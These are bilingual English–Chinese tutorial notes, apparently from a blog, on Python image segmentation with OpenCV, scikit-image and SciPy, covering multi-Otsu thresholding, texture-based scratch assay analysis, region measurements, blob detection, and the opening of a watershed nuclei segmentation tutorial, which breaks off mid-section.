      • 报告值 50 作为细胞核的阈值。
    1
    2
    ret2, thresh2 = cv2.threshold(blue_channel, 0, 255, cv2.THRESH_BINARY +  cv2.THRESH_OTSU)
    ret2, thresh2
    (50.0, array([[255, 255,   0, ...,   0,   0,   0],        [255, 255, 255, ...,   0,   0,   0],        [255, 255, 255, ...,   0,   0,   0],        ...,        [  0,   0,   0, ...,   0,   0,   0],        [  0,   0,   0, ...,   0,   0,   0],        [  0,   0,   0, ...,   0,   0,   0]], dtype=uint8))

    numpy.digitize

    • np.digitize needs bins to be defined as an array
      • 需要将这些二进制数据定义为数组
    • So let us convert the threshold value to an array
      • 让我们将阈值转换为一个数组
    • np.digitize assign values 0, 1, 2, 3, … to pixels in each class.
      • np.digitize 赋值 0,1,2,3,… 到每个类中的像素。
    • For binary it wold be 0 and 1.
      • 对于二进制,它是 0 和 1。
    1
    2
    3
    4
    import numpy as np

    regions1 = np.digitize(blue_channel, bins=np.array([ret2]))
    plt.imshow(regions1)
    <matplotlib.image.AxesImage at 0x20c00a05ca0>

    png

    Tutorial 52 - Auto-thresholding for multiple regions _using multi-otsu

    1
    2
    3
    4
    from matplotlib import pyplot as plt
    import numpy as np
    from skimage.filters import threshold_multiotsu
    import cv2
    1
    img = cv2.imread("images/BSE.tif", 0)
    1
    plt.imshow(img, cmap="gray")
    <matplotlib.image.AxesImage at 0x163340e4e20>

    png

    1
    2
    # .flat returns the flattened numpy array (1D)
    plt.hist(img.flat, bins=100, range=(100, 255))
    (array([ 1503.,  4537.,  3200.,  4608.,  5865.,  7691.,  9625., 25963.,            0., 33377., 18666., 19131., 36722.,     0., 31707., 13031.,        10769.,  8827.,  6923.,  5264.,  7160.,  2595.,  1889.,  1722.,         1539.,  3244.,     0.,  4418.,  3113.,  4053., 11409.,     0.,        16772., 10292., 10680., 11360., 11665., 11160., 19404.,     0.,        14149.,  5101.,  3961.,  4908.,     0.,  2600.,   669.,   518.,          354.,   477.,   172.,   160.,   114.,   126.,   255.,     0.,          267.,   142.,   134.,    87.,   123.,   204.,    84.,   122.,           98.,   104.,   107.,   206.,     0.,   207.,   108.,   116.,          256.,     0.,   244.,   137.,   140.,   138.,   166.,   170.,          383.,   237.,   316.,   343.,   477.,  1422.,     0.,  2259.,         1469.,  1623.,  3926.,     0.,  4171.,  1900.,  1763.,  1432.,         1093.,   809.,  1017.,   603.]), array([100.  , 101.55, 103.1 , 104.65, 106.2 , 107.75, 109.3 , 110.85,        112.4 , 113.95, 115.5 , 117.05, 118.6 , 120.15, 121.7 , 123.25,        124.8 , 126.35, 127.9 , 129.45, 131.  , 132.55, 134.1 , 135.65,        137.2 , 138.75, 140.3 , 141.85, 143.4 , 144.95, 146.5 , 148.05,        149.6 , 151.15, 152.7 , 154.25, 155.8 , 157.35, 158.9 , 160.45,        162.  , 163.55, 165.1 , 166.65, 168.2 , 169.75, 171.3 , 172.85,        174.4 , 175.95, 177.5 , 179.05, 180.6 , 182.15, 183.7 , 185.25,        186.8 , 188.35, 189.9 , 191.45, 193.  , 194.55, 196.1 , 197.65,        199.2 , 200.75, 202.3 , 203.85, 205.4 , 206.95, 208.5 , 210.05,        211.6 , 213.15, 214.7 , 216.25, 217.8 , 219.35, 220.9 , 222.45,        224.  , 225.55, 227.1 , 228.65, 230.2 , 231.75, 233.3 , 234.85,        236.4 , 237.95, 239.5 , 241.05, 242.6 , 244.15, 245.7 , 247.25,        248.8 , 250.35, 251.9 , 253.45, 255.  ]), <BarContainer object of 100 artists>)

    png

    MANUAL 手工阈值分割

    • Can perform manual segmentation but auto works fine
      • 能执行手动分割,但自动工作精细
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    region1 = (img >= 0) & (img <75)
    region2 = (img >= 75) & (img <140)
    region3 = (img >= 140) & (img <200)
    region4 = (img >= 200) & (img <=255)
    # Create 3 channel blank image of same size as original
    # 创建 3 通道空白图像,大小与原始图像相同
    all_regions = np.zeros((img.shape[0], img.shape[1], 3))
    all_regions[region1] = (1,0,0) # 红
    all_regions[region2] = (0,1,0) # 绿
    all_regions[region3] = (0,0,1) # 蓝
    all_regions[region4] = (1,1,0) # 黄
    1
    all_regions
    array([[[0., 0., 1.],        [0., 0., 1.],        [0., 0., 1.],        ...,        [0., 1., 0.],        [0., 1., 0.],        [0., 1., 0.]],       [[0., 0., 1.],        [0., 0., 1.],        [0., 0., 1.],        ...,        [0., 1., 0.],        [0., 1., 0.],        [0., 1., 0.]],       [[0., 0., 1.],        [0., 0., 1.],        [0., 0., 1.],        ...,        [0., 1., 0.],        [0., 1., 0.],        [0., 1., 0.]],       ...,       [[0., 0., 1.],        [0., 0., 1.],        [0., 0., 1.],        ...,        [0., 1., 0.],        [0., 1., 0.],        [0., 1., 0.]],       [[0., 0., 1.],        [0., 0., 1.],        [0., 0., 1.],        ...,        [0., 1., 0.],        [0., 1., 0.],        [0., 1., 0.]],       [[0., 0., 1.],        [0., 0., 1.],        [0., 0., 1.],        ...,        [0., 1., 0.],        [0., 1., 0.],        [0., 1., 0.]]])
    1
    plt.imshow(all_regions)
    <matplotlib.image.AxesImage at 0x16334046340>

    png

    AUTO 自动

    1
    2
    # Apply multi-Otsu threshold 
    thresholds = threshold_multiotsu(img, classes=4)
    • Digitize (segment) original image into multiple classes.
      • 将原始图像数字化(分割)成多个类。
    • np.digitize assign values 0, 1, 2, 3, … to pixels in each class.

    将原始图像数字化(分割)成多个类。

    1
    2
    regions = np.digitize(img, bins=thresholds)
    plt.imshow(regions)
    <matplotlib.image.AxesImage at 0x163340a6a30>

    png

    1
    2
    3
    4
    segm1 = (regions == 0)
    segm2 = (regions == 1)
    segm3 = (regions == 2)
    segm4 = (regions == 3)

    OpenCV 图像处理之膨胀与腐蚀

    • We can use binary opening and closing operations to clean up.
      • 我们可以使用二进制的膨胀和腐蚀操作来清理。
    • Open takes care of isolated pixels within the window
      • Open 负责处理窗口内的独立像素
    • Closing takes care of isolated holes within the defined window
      • 关闭处理已定义窗口内的隔离孔

    png

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    from scipy import ndimage as nd

    segm1_opened = nd.binary_opening(segm1, np.ones((3,3)))
    segm1_closed = nd.binary_closing(segm1_opened, np.ones((3,3)))

    segm2_opened = nd.binary_opening(segm2, np.ones((3,3)))
    segm2_closed = nd.binary_closing(segm2_opened, np.ones((3,3)))

    segm3_opened = nd.binary_opening(segm3, np.ones((3,3)))
    segm3_closed = nd.binary_closing(segm3_opened, np.ones((3,3)))

    segm4_opened = nd.binary_opening(segm4, np.ones((3,3)))
    segm4_closed = nd.binary_closing(segm4_opened, np.ones((3,3)))

    all_segments_cleaned = np.zeros((img.shape[0], img.shape[1], 3))

    all_segments_cleaned[segm1_closed] = (1,0,0)
    all_segments_cleaned[segm2_closed] = (0,1,0)
    all_segments_cleaned[segm3_closed] = (0,0,1)
    all_segments_cleaned[segm4_closed] = (1,1,0)

    plt.imshow(all_segments_cleaned) # All the noise should be cleaned now
    <matplotlib.image.AxesImage at 0x1633505ba00>

    png

    Tutorial 53 - Using texture to segment images -demo in python

    • Variance - excerptation of the squared deviation of a random variable from its mean.Could be a good indicator of texture.

      • 方差 -一个随机变量的方差的平均值的例外。可能是 Texture 的好指标。
    • Entropy - quantifies disorder - a very good metric to quantify texture

      • -量化无序-一个非常好的量化纹理的度量

    Gabor convolutional kernal - Gabor 卷积核

    $$g(x,y,\lambda,\theta,\psi,\sigma,\gamma)=\exp\left(-\frac{x’2+\gamma2y’2}{2\sigma2}\right)\cos\left(2\pi\frac{x’}{\lambda+\psi}\right)$$

    其中:

    $x’=x\cos(\theta)+y\sin(\theta)$

    $y’=-x\sin(\theta)+y\cos(\theta)$

    1
    2
    3
    4
    5
    import matplotlib.pyplot as plt
    from skimage import io
    import numpy as np
    from skimage.filters import threshold_otsu
    import cv2
    1
    2
    img = io.imread("images/Scratch0.jpg", as_gray=True)
    plt.imshow(img, cmap="gray")
    <matplotlib.image.AxesImage at 0x22ee31fc790>

    png

    • Variance - not a great way to quantify texture

      • 方差 -不是一个量化纹理的好方法
    1
    2
    3
    4
    5
    6
    7
    from scipy import ndimage 

    k = 7
    img_mean = ndimage.uniform_filter(img, (k, k))
    img_sqr_mean = ndimage.uniform_filter(img ** 2, (k, k))
    img_var = img_sqr_mean - img_mean ** 2
    plt.imshow(img_var, cmap='gray')
    <matplotlib.image.AxesImage at 0x22ee37a4d90>

    png

    论文阅读:Gabor Convolutional Networks_OopsZero 的博客-CSDN 博客_gabor 卷积

    • GABOR - A great filter for texture but usually efficient.

      • GABOR -一个很好的纹理过滤器,但通常是有效的。
    • if we know exact parameters. Good choice for generating features for machine learning

      • 如果我们知道精确的参数。为机器学习生成特征的好选择。
    1
    2
    3
    4
    5
    ksize = 45
    theta = np.pi / 4
    kernel = cv2.getGaborKernel((ksize, ksize), 5.0, theta, 10.0, 0.9, 0, ktype=cv2.CV_32F)
    filtered_image = cv2.filter2D(img, cv2.CV_8UC3, kernel)
    plt.imshow(filtered_image, cmap='gray')
    <matplotlib.image.AxesImage at 0x22ee37d7430>

    png

    • Entropy: Entropy quantifies disorder.

      • : 熵量化无序。
    • Since cell region has high variation in pixel values the entropy would be higher compared to scratch region

      • 由于细胞区域的像素值变化较大,熵值将高于划痕区域
    1
    2
    3
    4
    5
    from skimage.filters.rank import entropy
    from skimage.morphology import disk

    entropy_img = entropy(img, disk(3))
    plt.imshow(entropy_img)
    <matplotlib.image.AxesImage at 0x22ee39d3d60>

    png

    • Scratch Analysis - single image

      • 划痕分析 -单幅图像
    • Now let us use otsu to threshold high vs low entropy regions.

      • 现在让我们用 otsu 来阈值高熵区和低熵区。
    1
    plt.hist(entropy_img.flat, bins=100, range=(0,5))  #.flat returns the flattened numpy array (1D)
    (array([2.4906e+04, 0.0000e+00, 0.0000e+00, 0.0000e+00, 1.2640e+03,        4.0000e+00, 1.1000e+01, 3.4300e+02, 5.5700e+02, 1.0300e+02,        5.0000e+00, 6.8000e+02, 1.1500e+02, 3.4200e+02, 3.2900e+02,        3.1000e+02, 4.3700e+02, 1.9700e+02, 5.8100e+02, 1.6200e+02,        7.0100e+02, 1.4600e+02, 7.9900e+02, 2.1600e+02, 8.2000e+02,        4.6400e+02, 8.6300e+02, 6.2200e+02, 6.5100e+02, 7.2900e+02,        9.3500e+02, 1.0210e+03, 1.0650e+03, 1.1500e+03, 1.3230e+03,        1.5200e+03, 1.7200e+03, 1.9000e+03, 1.9490e+03, 2.6150e+03,        2.2130e+03, 3.0250e+03, 2.5620e+03, 3.1800e+03, 3.1780e+03,        3.2440e+03, 3.6230e+03, 3.3250e+03, 3.3660e+03, 3.5170e+03,        3.1100e+03, 3.3400e+03, 2.7800e+03, 2.6460e+03, 2.6750e+03,        2.0790e+03, 2.3660e+03, 1.8520e+03, 1.6350e+03, 1.5170e+03,        1.2040e+03, 1.1810e+03, 9.1000e+02, 8.3300e+02, 7.9300e+02,        6.5600e+02, 5.7100e+02, 4.1800e+02, 4.1400e+02, 3.6200e+02,        2.7300e+02, 2.2500e+02, 2.0900e+02, 1.8400e+02, 1.5600e+02,        1.0200e+02, 7.1000e+01, 5.7000e+01, 6.6000e+01, 3.2000e+01,        3.2000e+01, 2.0000e+01, 1.7000e+01, 5.0000e+00, 1.2000e+01,        2.0000e+00, 5.0000e+00, 2.0000e+00, 0.0000e+00, 0.0000e+00,        0.0000e+00, 0.0000e+00, 0.0000e+00, 0.0000e+00, 0.0000e+00,        0.0000e+00, 0.0000e+00, 0.0000e+00, 0.0000e+00, 0.0000e+00]), array([0.  , 0.05, 0.1 , 0.15, 0.2 , 0.25, 0.3 , 0.35, 0.4 , 0.45, 0.5 ,        0.55, 0.6 , 0.65, 0.7 , 0.75, 0.8 , 0.85, 0.9 , 0.95, 1.  , 1.05,        1.1 , 1.15, 1.2 , 1.25, 1.3 , 1.35, 1.4 , 1.45, 1.5 , 1.55, 1.6 ,        1.65, 1.7 , 1.75, 1.8 , 1.85, 1.9 , 1.95, 2.  , 2.05, 2.1 , 2.15,        2.2 , 2.25, 2.3 , 2.35, 2.4 , 2.45, 2.5 , 2.55, 2.6 , 2.65, 2.7 ,        2.75, 2.8 , 2.85, 2.9 , 2.95, 3.  , 3.05, 3.1 , 3.15, 3.2 , 3.25,        3.3 , 3.35, 3.4 , 3.45, 3.5 , 3.55, 3.6 , 3.65, 3.7 , 3.75, 3.8 ,        3.85, 3.9 , 3.95, 4.  , 4.05, 4.1 , 4.15, 4.2 , 4.25, 4.3 , 4.35,        4.4 , 4.45, 4.5 , 4.55, 4.6 , 4.65, 4.7 , 4.75, 4.8 , 4.85, 4.9 ,        4.95, 5.  ]), <BarContainer object of 100 artists>)

    png

    • Now let us binarize the entropy image
      • 现在我们把熵图像二值化
    1
    2
    thresh = threshold_otsu(entropy_img)
    thresh
    1.2953342370696572
    1
    2
    binary = entropy_img <= thresh
    plt.imshow(binary)
    <matplotlib.image.AxesImage at 0x22ee3ab2280>

    png

    1
    2
    3
    4
    5
    6
    # Sum all pixels in the scratch region (values =1)
    scratch_area = np.sum(binary == 1)
    print("Scratched area is: ", scratch_area, "Square pixels")

    scale = 0.45 # microns / pixel
    print("Scratched area in sq. microns is: ", scratch_area*((scale)**2), "Square pixels")
    Scratched area is:  33485 Square pixelsScratched area in sq. microns is:  6780.712500000001 Square pixels

    Tutorial 54 - Scratch assay analysis in python by using texture for segmentation

    What is scratch assay (wound healing) analysis? 什么是划痕分析(伤口愈合)?

    • The wound healing assay is a standard technique for probing collective cell migration in two dimensions.

      • 伤口愈合试验是一种标准的技术,用于探测细胞在二维上的集体迁移。
    • A monolayer of cells scratched with a pipette tip.

      • 用移液管尖划破的单层细胞。
    • The migration of cells into the gap imaged over several hours using a microscope.

      • 用显微镜在几个小时内拍摄到细胞进入缝隙的迁移过程。
    • The primary information derived is the rate of gap closure → a measure of the speed of the collective motion of the cells.

      • 得到的主要信息是间隙闭合率→细胞集体运动速度的度量。

    png


    • Scratch Assay on time series images
      • 时间序列图像划痕分析
    1
    2
    3
    4
    5
    6
    import matplotlib.pyplot as plt
    from skimage import io
    from skimage.filters.rank import entropy
    from skimage.morphology import disk
    import numpy as np
    from skimage.filters import threshold_otsu
    • Use glob to extract image names and load them.
      • 使用glob提取图像名称并加载它们。
    1
    import glob
    1
    2
    3
    4
    5
    time = 0
    scale = 0.45 # microns/pixel
    time_list = []
    area_list = []
    path = "images/scratch_assay/*.*"
    • Put the code from single image segmentation in a for loop to apply segmentaion to all images
      • 将来自单个图像分割的代码放入for循环中,将分割应用于所有图像
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    for file in glob.glob(path):
    img=io.imread(file)
    entropy_img = entropy(img, disk(3))
    thresh = threshold_otsu(entropy_img)
    binary = entropy_img <= thresh
    scratch_area = np.sum(binary == 1)
    scratch_area = scratch_area * ((scale) ** 2) # Convert to microns from pixel units
    print("time=", time, "hr ", "Scratch area=", scratch_area, "um\N{SUPERSCRIPT TWO}")
    time_list.append(time)
    area_list.append(scratch_area)
    time += 1
    time= 0 hr   Scratch area= 6768.765 um²time= 1 hr   Scratch area= 5605.807500000001 um²time= 2 hr   Scratch area= 4881.465 um²time= 3 hr   Scratch area= 4277.4075 um²time= 4 hr   Scratch area= 3742.4025 um²time= 5 hr   Scratch area= 3261.2625000000003 um²time= 6 hr   Scratch area= 2919.4425 um²time= 7 hr   Scratch area= 2575.1925 um²time= 8 hr   Scratch area= 2218.7925 um²time= 9 hr   Scratch area= 1890.7425 um²
    1
    plt.plot(time_list, area_list, 'bo')  # Print blue dots scatter plot
    [<matplotlib.lines.Line2D at 0x295b35d21c0>]

    png

    • Print slope, intercept

      • 打印斜率、截距
    1
    2
    3
    4
    5
    from scipy.stats import linregress  # Linear regression

    slope, intercept, r_value, p_value, std_err = linregress(time_list, area_list)
    print("y = ",slope, "x", " + ", intercept)
    print("R\N{SUPERSCRIPT TWO} = ", r_value ** 2)
    y =  -507.25881818181824 x  +  6096.792681818182R² =  0.9568904267126052

    Tutorial 55 - Image segmentation followed by measurements- in python

    1
    2
    3
    4
    5
    from skimage import measure, io, img_as_ubyte
    import matplotlib.pyplot as plt
    from skimage.color import label2rgb, rgb2gray
    import numpy as np
    import cv2
    1
    2
    image = img_as_ubyte(rgb2gray(io.imread('images/cast_iron1.tif')))
    scale = 0.6
    1
    plt.imshow(image, cmap='gray')
    <matplotlib.image.AxesImage at 0x200892d89a0>

    png

    1
    plt.hist(image.flat, bins=100, range=(0, 255))
    (array([    0.,    46.,   479.,  1449.,   966.,  1498.,  1081.,  1901.,         1408.,  2200.,  2605.,  1816.,  2434.,  1382.,  1474.,   686.,          719.,   387.,   439.,   275.,   322.,   311.,   195.,   347.,          197.,   305.,   191.,   297.,   193.,   303.,   315.,   169.,          300.,   173.,   331.,   239.,   344.,   234.,   409.,   271.,          467.,   435.,   337.,   569.,   420.,   744.,   545.,   906.,          747.,  1251.,  1509.,  1195.,  2163.,  1900.,  3508.,  3022.,         5913.,  5444., 11870., 11205., 25793., 40120., 29310., 32387.,         8740.,  1102.,     0.,     0.,     0.,     0.,     0.,     0.,            0.,     0.,     0.,     0.,     0.,     0.,     0.,     0.,            0.,     0.,     0.,     0.,     0.,     0.,     0.,     0.,            0.,     0.,     0.,     0.,     0.,     0.,     0.,     0.,            0.,     0.,     0.,     0.]), array([  0.  ,   2.55,   5.1 ,   7.65,  10.2 ,  12.75,  15.3 ,  17.85,         20.4 ,  22.95,  25.5 ,  28.05,  30.6 ,  33.15,  35.7 ,  38.25,         40.8 ,  43.35,  45.9 ,  48.45,  51.  ,  53.55,  56.1 ,  58.65,         61.2 ,  63.75,  66.3 ,  68.85,  71.4 ,  73.95,  76.5 ,  79.05,         81.6 ,  84.15,  86.7 ,  89.25,  91.8 ,  94.35,  96.9 ,  99.45,        102.  , 104.55, 107.1 , 109.65, 112.2 , 114.75, 117.3 , 119.85,        122.4 , 124.95, 127.5 , 130.05, 132.6 , 135.15, 137.7 , 140.25,        142.8 , 145.35, 147.9 , 150.45, 153.  , 155.55, 158.1 , 160.65,        163.2 , 165.75, 168.3 , 170.85, 173.4 , 175.95, 178.5 , 181.05,        183.6 , 186.15, 188.7 , 191.25, 193.8 , 196.35, 198.9 , 201.45,        204.  , 206.55, 209.1 , 211.65, 214.2 , 216.75, 219.3 , 221.85,        224.4 , 226.95, 229.5 , 232.05, 234.6 , 237.15, 239.7 , 242.25,        244.8 , 247.35, 249.9 , 252.45, 255.  ]), <BarContainer object of 100 artists>)

    png

    1
    2
    3
    from skimage.filters import threshold_otsu
    threshold = threshold_otsu(image)
    threshold
    93
    1
    2
    3
    # Generate thresholded image
    thresholded_img = image < threshold
    plt.imshow(thresholded_img, cmap='gray')
    <matplotlib.image.AxesImage at 0x20089b28760>

    png

    1
    2
    3
    4
    5
    # Remove edge touching regions
    from skimage.segmentation import clear_border

    edge_touching_removed = clear_border(thresholded_img)
    plt.imshow(edge_touching_removed, cmap='gray')
    <matplotlib.image.AxesImage at 0x20089c39ca0>

    png

    • Label connected regions of an integer array using measure.label

      • 使用measure.label标记整数数组中已连接的区域
    • Labels each connected entity as one object

      • 将每个连接的实体标记为一个对象
    • Connectivity = Maximum number of orthogonal hops to consider a pixel/voxel as a neighbor.

      • 连通性 = 将像素 / 体素视为邻居的最大正交跳数。
    • If None, a full connectivity of input.ndim is used, number of dimensions of the image

      • 如果为None,则表示输入的完全连通性。
    • For 2D image it would be 2

      • 对于2D图像,它将是2
    1
    2
    label_image = measure.label(edge_touching_removed, connectivity=image.ndim)
    plt.imshow(label_image)
    <matplotlib.image.AxesImage at 0x20089c9dbb0>

    png

    • Return an RGB image where color-coded labels are painted over the image.

      • 返回一个RGB图像,其中颜色编码的标签涂在图像上。
    • Using label2rgb

    1
    2
    image_label_overlay = label2rgb(label_image, image=image)
    plt.imshow(image_label_overlay)
    <matplotlib.image.AxesImage at 0x20089d0a8e0>

    png

    1
    2
    3
    4
    5
    6
    7
    #################################################
    # Calculate properties
    # Using regionprops or regionprops_table
    all_props = measure.regionprops(label_image, image)
    # Can print various parameters for all objects
    for prop in all_props:
    print('Label: {} Area: {}'.format(prop.label, prop.area))
    • Compute image properties and return them as a pandas-compatible table.

      • 计算映像属性并将它们作为与pandas兼容的表返回。
    • Available regionprops: area, bbox, centroid, convex_area, coords, eccentricity, equivalent diameter, euler number, label, intensity image, major axis length, max intensity, mean intensity, moments, orientation, perimeter, solidity, and many more

      • 可用的区域:面积,bbox,质心,凸面积,坐标,偏心,等效直径,欧拉数,标签,强度图像,主轴长度,最大强度,平均强度,力矩,方向,周长,固体,和许多
    1
    2
    3
    4
    props = measure.regionprops_table(label_image, image, 
    properties=['label',
    'area', 'equivalent_diameter',
    'mean_intensity', 'solidity'])
    1
    2
    3
    import pandas as pd
    df = pd.DataFrame(props)
    df.head()
    label area equivalent_diameter mean_intensity solidity
    0 1 1 1.128379 92.000000 1.000000
    1 2 587 27.338464 19.701874 0.956026
    2 3 1 1.128379 83.000000 1.000000
    3 4 40 7.136496 64.625000 0.701754
    4 5 1 1.128379 91.000000 1.000000
    1
    2
    3
    # To delete small regions...
    df = df[df['area'] > 50]
    df.head()
    label area equivalent_diameter mean_intensity solidity
    1 2 587 27.338464 19.701874 0.956026
    8 9 366 21.587165 32.696721 0.963158
    11 12 226 16.963258 32.787611 0.945607
    15 16 71 9.507892 49.253521 0.934211
    16 17 220 16.736568 28.759091 0.897959

    Convert to micron scale

    1
    2
    3
    df['area_sq_microns'] = df['area'] * (scale ** 2)
    df['equivalent_diameter_microns'] = df['equivalent_diameter'] * (scale)
    df.head()
    label area equivalent_diameter mean_intensity solidity area_sq_microns equivalent_diameter_microns
    1 2 587 27.338464 19.701874 0.956026 211.32 16.403078
    8 9 366 21.587165 32.696721 0.963158 131.76 12.952299
    11 12 226 16.963258 32.787611 0.945607 81.36 10.177955
    15 16 71 9.507892 49.253521 0.934211 25.56 5.704735
    16 17 220 16.736568 28.759091 0.897959 79.20 10.041941
    1
    df.to_csv('data/cast_iron_measurements.csv')

    Tutorial 56 - Blob Detector for segmentation based on feature properties -in python-

    blob_百度百科 (baidu.com)

    ​ 计算机视觉中的Blob是指图像中的一块连通区域,Blob分析就是对前景/背景分离后的二值图像,进行连通域提取和标记。标记完成的每一个Blob都代表一个前景目标,然后就可以计算Blob的一些相关特征。其优点在于通过Blob提取,可以获得相关区域的信息,但是速度较慢,分析难度大。

    https://www.learnopencv.com/blob-detection-using-opencv-python-c/

    • BLOB stands for Binary Large OBject and refers to a group of connected pixels in a binary image.

      • BLOB代表二进制大对象,指的是二值图像中一组相互连接的像素。
    • A Blob is a group of connected pixels in an image that share some common property ( E.g grayscale value ).

      • Blob是一组在图像中具有某种共同属性(如灰度值)的相互连接的像素。
    • In the image above, the dark connected regions are blobs,
      and the goal of blob detection is to identify and mark these regions.

      • 在上图中,暗连接的区域是斑点,斑点检测的目标是识别和标记这些区域。

    How it works:

    • Threshold input images to binary.

      • 阈值输入图像为二值。
    • Grouping: connected white/black pixels are grouped together.

      • 分组:连接的白色/黑色像素分组在一起。
    • Merging: blobs located closer than minDistBetweenBlobs are merged.

      • 合并:位于比minDistBetweenBlobs更近的blobs被合并。
    • Center & Radius Calculation : The centers and radii of the new merged blobs are computed and returned.

      • 中心和半径计算:计算并返回新合并blobs的中心和半径。

    • Can be filtered by color, size or shape
      • 可以根据颜色、大小或形状过滤
    1
    2
    3
    import matplotlib.pyplot as plt
    import numpy as np
    import cv2
    1
    image = cv2.imread('images/cast_iron1.tif', 0)
    • Set up the SimpleBlobdetector with default parameters.
      • 使用默认参数设置 SimpleBlobdetector。
    1
    params = cv2.SimpleBlobDetector_Params()
    • Define thresholds
      • 定义阈值

    Can define thresholdStep. See documentation.

    1
    2
    params.minThreshold = 0
    params.maxThreshold = 255
    • Filter by Area.
      • 按面积过滤。
    1
    2
    3
    params.filterByArea = True
    params.minArea = 50
    params.maxArea = 10000
    • Filter by Color (black=0)
      • 按颜色过滤
    1
    2
    params.filterByColor = False  #Set true for cast_iron as we'll be detecting black regions
    params.blobColor = 0
    • Filter by Circularity
      • 圆度过滤器
    1
    2
    3
    params.filterByCircularity = True
    params.minCircularity = 0.5
    params.maxCircularity = 1
    • Filter by Convexity
      • 通过凸性过滤器
    1
    2
    3
    params.filterByConvexity = True
    params.minConvexity = 0.5
    params.maxConvexity = 1
    • Filter by InertiaRatio
      • 通过惯性系数过滤器
    1
    2
    3
    params.filterByInertia = True
    params.minInertiaRatio = 0
    params.maxInertiaRatio = 1
    • Distance Between Blobs
      • Blobs 之间的距离
    1
    params.minDistBetweenBlobs = 0
    • Setup the detector with parameters
      • 用参数设置探测器
    1
    detector = cv2.SimpleBlobDetector_create(params)
    • Detect blobs
      • 检测 blobs
    1
    2
    keypoints = detector.detect(image)
    print("Number of blobs detected are : ", len(keypoints))
    Number of blobs detected are :  82
    • Draw blobs
      • 绘制 blobs
    1
    2
    img_with_blobs = cv2.drawKeypoints(image, keypoints, np.array([]), (0,0,255), cv2.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS)
    plt.imshow(img_with_blobs)
    <matplotlib.image.AxesImage at 0x2b46aa494f0>

    png

    Tutorial 57 - Nuclei -cell- segmentation in python using watershed

    What is watershed? 什么是分水岭?

    • Any grayscale image can be viewed as a topographic surface where high intensity denotes hills and low intensity denotes valleys.
      • 任何灰度图像都可以看作是一个地形表面,其中高强度表示丘陵,低强度表示山谷。

    png

    • With watershed, we start filling every valleys with different colored water (labels).

      • 有了分水岭,我们开始用不同颜色的水(标签)填充每个山谷。
    • As the water rises, water from different valleys will start to merge.

      • 随着水位上升,来自不同山谷的水开始融合。
    • To avoid that, we build barriers in the locations where water merges.

      • 为了避免这种情况,我们在水汇合处建造了屏障。
    • Continue filling water and building barriers until all the peaks are under water.

      • 继续填水和建造屏障,直到所有的山峰都在水下。
    • The barriers will give us the segmentation result.

      • 屏障会给我们分割的结果。

    png

    • To minimize over-segmentation due to noise in the image, OpenCV implemented a marker-based watershedalgorithm.
      • 为了减少图像中噪声引起的过分割,OpenCV 实现了一种基于标记的分水岭算法。
    • We specify all valley points to be merged and also the ones not to be merged.
      • 我们指定所有要合并的谷点和不合并的谷点。
    • We first label the regions that we are sure of being the foreground (or object of interest) with one color.
      • 我们首先用一种颜色标记我们确定是前景(或感兴趣的对象)的区域。
    • Then label the regions that we are sure of being background or non-object with another color.
      • 然后用另一种颜色标记我们确定为背景或非物体的区域。
    • And, for unsure regions in between, label them with 0.
      • 对于中间的不确定区域,用 0 标记它们。
    • This process creates the marker.
      • 这个过程创建了标记。
    • Now apply watershed algorithm.
      • 现在应用分水岭算法。
    • The marker will be updated with the labels we provided, and the boundaries of objects will have a value of -1.
      • 标记将更新为我们提供的标签,对象的边界将有一个-1 的值。

    https://opencv-python-tutroals.readthedocs.io/en/latest/py_tutorials/py_imgproc/py_watershed/py_watershed.html


    • This code performs cell counting and size distribution analysis and dumps results into a csv file.

      • 此代码执行单元格计数和大小分布分析,并将结果转储到csv文件中。
    • It uses watershed segmentation for better segmentation, separating touching nuclei.

      • 它使用分水岭分割来更好的分割,分离接触的核。
    1
    2
    3
    4
    5
    import cv2
    import numpy as np
    from matplotlib import pyplot as plt
    from scipy import ndimage
    from skimage import measure, color, io
    1
    img = cv2.imread('images/Osteosarcoma_01.tif')
    • Extract only blue channel as DAPI / nuclear (blue) staining is the best channel to perform cell count.

      • 只提取蓝色通道,因为DAPI /核(蓝色)染色是进行细胞计数的最佳通道。
    • Blue channel. Image equivalent to grey image.

      • 蓝色通道。图像相当于灰色图像。
    1
    cells = img[:, :, 0]
    1
    plt.imshow(cells, cmap='gray')
    <matplotlib.image.AxesImage at 0x2b36b074850>

    png

    • 1 pixel = 454 nm (got this from the metadata of original image)

      • 1像素 = 454 nm(来自原始图像的元数据)
    1
    pixels_to_um = 0.454

    STEP 1: Thresholded image for nuclei 核的阈值图像

    • Threshold image to binary using OTSU. ALl thresholded pixels will be set to 255
      • 阈值图像的二值化使用 OTSU。所有阈值像素将被设置为255
    1
    2
    ret1, thresh = cv2.threshold(cells, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)
    plt.imshow(thresh, cmap='gray')
    <matplotlib.image.AxesImage at 0x2b36b181f10>

    png

    • Morphological operations to remove small noise - opening

      • 形态学运算去除开孔小噪声
    • To remove holes we can use closing

      • 要去除小孔,我们可以用闭合法
    1
    2
    3
    4
    5
    6
    kernel = np.ones((3,3),np.uint8)
    opening = cv2.morphologyEx(thresh,cv2.MORPH_OPEN,kernel, iterations = 2)

    from skimage.segmentation import clear_border
    opening = clear_border(opening) # Remove edge touching grains
    plt.imshow(opening, cmap='gray') # This is our image to be segmented further using watershed
    <matplotlib.image.AxesImage at 0x2b36bd0d6d0>

    png

    • Check the total regions found before and after applying this.
      • 检查应用此方法前后找到的区域总数。

    STEP 2: Sude background

    • Now we know that the regions at the center of cells is for sure cells

      • 现在我们知道细胞中心的区域是确定的细胞
    • The region far away is background.

      • 远处的区域是背景。
    • We need to extract sure regions. For that erode a few times.

      • 我们需要提取确定的区域。因为腐蚀了几次。
    • But we have cells touching, so erode alone will not work.

      • 但我们有细胞接触,所以单独腐蚀是不起作用的。
    • To separate touching objects, the best approach would be distance transform and then thresholding.

      • 要分离接触物体,最好的方法是先进行距离变换,再进行阈值分割。
    • let us start by identifying sure background area dilating pixes a few times increases cell boundary to background.

      • 让我们从确定背景区域开始,将像素放大几倍,以增加背景的细胞边界。
    • This way whatever is remaining for sure will be background.

      • 这样,任何可以确定的东西都将成为背景。
    • The area in between sure background and foreground is our ambiguous area.

